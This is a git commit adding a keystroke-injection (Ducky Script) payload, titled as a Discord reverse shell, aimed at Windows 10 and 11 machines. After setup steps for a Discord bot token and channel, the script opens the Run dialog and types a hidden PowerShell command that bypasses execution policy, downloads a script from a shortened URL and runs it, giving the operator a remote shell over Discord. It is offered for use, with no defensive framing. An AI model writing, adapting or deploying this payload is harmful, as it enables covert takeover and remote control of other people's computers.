Add files via upload

This commit is contained in:
egieb
2024-03-27 15:32:51 +00:00
committed by GitHub
parent 54efc813a9
commit 1a2e1c1f72
2 changed files with 193 additions and 0 deletions

View File

@@ -0,0 +1,23 @@
REM Title: beigeworm's Discord Reverse Shell.
REM Author: @beigeworm
REM Description: Using a Discord bot along with discords API to Act as a Powershell Terminal.
REM Target: Windows 10 and 11
REM SETUP
REM make a discord bot at https://discord.com/developers/applications/
REM add the bot to your discord server
REM Change BOT_TOKEN below with your bot token
REM Change CHANNEL_ID below to your channel id
REM for more info goto - https://github.com/beigeworm/PoshCord-C2
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex
ENTER